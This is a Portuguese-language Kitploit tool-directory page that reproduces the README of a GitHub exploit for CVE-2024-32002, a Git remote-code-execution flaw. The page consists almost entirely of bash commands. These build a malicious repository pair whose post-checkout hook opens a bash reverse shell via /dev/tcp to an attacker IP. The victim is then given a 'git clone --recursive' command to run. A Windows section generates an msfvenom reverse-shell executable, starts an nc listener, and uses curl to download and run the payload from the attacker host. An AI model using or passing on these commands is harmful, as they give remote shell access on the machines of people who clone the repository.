Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/charlesgargasson/cve-2024-32002
Escalada de PrivilégiosExploraçãoMovimento LateralExploração de Aplicações WebPós-ExploraçãoTestes de PenetraçãoComando e ControleRed TeamingDesenvolvimento de Payloads

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHubcharlesgargasson/cve-2024-32002

CVE-2024-32002

Exploit para CVE-2024-32002, uma vulnerabilidade de RCE no Git que utiliza clonagem recursiva de submódulos e symlinks para executar comandos arbitrários em alvos Windows e Linux.

Ver Repositório
9há 2 anosAinda não revisado

###################### GIT RCE CVE-2024-32002 ######################


Descrição


| CVE-2024-32002 | https://www.tarlogic.com/blog/cve-2024-32002-vulnerability-git/

|


Exploit


| Primeiro você precisa criar os repositórios "calledrepo" e "commandrepo" no git. | A vítima mais tarde chamará o calledrepo com "git clone --recursive calledrepo.git" que redireciona para o commandrepo e executa o script hook. | Este payload de reverse shell em bash funciona no WINDOWS e no LINUX. | | Estou usando o git cli no docker porque não quero ter problemas com a configuração do meu git do sistema, mas é opcional.

.. code-block:: bash

Iniciar uma instância debian docker

docker run --rm -it debian

Instalar git

apt update apt install -y git

| Configurando o git

.. code-block:: bash

git config --global user.email "whatever" git config --global user.name "whatever" git config --global protocol.file.allow always git config --global core.symlinks true git config --global init.defaultBranch main

| Definindo variáveis

.. code-block:: bash

GIT_IP="10.129.19.99" GIT_USER="charles" GIT_PORT="3000" LHOST="10.10.14.113" LPORT="4444"

| Populando os repositórios

.. code-block:: bash

cd /tmp rm -rf calledrepo commandrepo

git clone "http://$GIT_IP:$GIT_PORT/$GIT_USER/commandrepo.git" cd commandrepo mkdir -p y/hooks cat <y/hooks/post-checkout #!/bin/bash /bin/bash -c "bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1" EOF chmod +x y/hooks/post-checkout git add y/hooks/post-checkout git commit -m "post-checkout" git push cd ..

git clone "http://$GIT_IP:$GIT_PORT/$GIT_USER/calledrepo.git" cd calledrepo git submodule add --name x/y "http://$GIT_IP:$GIT_PORT/$GIT_USER/commandrepo.git" A/modules/x git commit -m "add-submodule" printf ".git" > dotgit.txt git hash-object -w --stdin < dotgit.txt > dot-git.hash printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info git update-index --index-info < index.info git commit -m "add-symlink" git push cd ..

Echo the command to run on victim

echo "git clone --recursive http://$GIT_IP:$GIT_PORT/$GIT_USER/calledrepo.git"

|


Windows


| Após explorar no Windows, você obterá um git bash que tem alguns problemas/restrições: |

.. code-block:: bash

$ C:\windows\System32\whoami.exe /all bash: C:windowsSystem32whoami.exe: command not found

| Se quiser escapar deste ambiente, você pode chamar um novo reverse shell |

.. code-block:: bash

Lado atacante

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o payload.exe sudo cp payload.exe /var/www/html sudo nc -nvlp 443 -s 10.10.14.113

.. code-block:: bash

Lado Windows

cd ~/ curl http://10.10.14.113/payload.exe -O payload.exe ./payload.exe

|

| Não se esqueça que o git bash pode ter prioridade de caminho sobre os comandos do Windows. | Você pode executar o comando do Windows usando o caminho completo. |

.. code-block:: bash

C:\windows\System32\whoami.exe /all

|

Baixar ferramenta